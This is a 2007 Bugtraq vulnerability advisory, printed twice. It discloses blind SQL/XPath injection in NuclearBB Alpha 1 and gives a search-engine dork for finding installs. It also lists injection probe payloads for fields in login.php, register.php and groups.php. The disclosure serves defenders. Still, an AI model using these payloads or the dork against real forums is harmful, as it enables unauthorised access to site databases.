Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Apr 18 2007 07:16PM
john martinelli com
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
----------------------------
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
--------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=passwordxyz
pass2=passwordxyz
website=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
----------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
----------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
coppa_state=over
register_submit=Register
==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------
http://www.example.com/groups.php?g=1+and+1=0
------------------------------
register.php - $_POST['email']
------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com+ [email concealed]and+1=0
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over®ister_submit=Register
John Martinelli
john (at) martinelli (dot) com [email concealed]
http://john-martinelli.com
April 18th, 2007
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
=============
String Inputs
=============
----------------------------
login.php - $_POST['submit']
----------------------------
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
--------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=passwordxyz
pass2=passwordxyz
website=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
----------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
----------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com [email concealed]
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]"+and+"1"="0
coppa_state=over
register_submit=Register
==============
Numeric Inputs
==============
-----------------------
groups.php - $_GET['g']
-----------------------
http://www.example.com/groups.php?g=1+and+1=0
------------------------------
register.php - $_POST['email']
------------------------------
username=xyz (at) xyz (dot) com [email concealed]
email=xyz (at) xyz (dot) com+ [email concealed]and+1=0
pass1=xyz (at) xyz (dot) com [email concealed]
pass2=xyz (at) xyz (dot) com [email concealed]
website=xyz (at) xyz (dot) com [email concealed]
location=xyz (at) xyz (dot) com [email concealed]
msn=xyz (at) xyz (dot) com [email concealed]
yahoo=xyz (at) xyz (dot) com [email concealed]
aol=xyz (at) xyz (dot) com [email concealed]
icq=xyz (at) xyz (dot) com [email concealed]
signature=xyz (at) xyz (dot) com [email concealed]
coppa_state=over®ister_submit=Register
John Martinelli
john (at) martinelli (dot) com [email concealed]
http://john-martinelli.com
April 18th, 2007
[ reply ]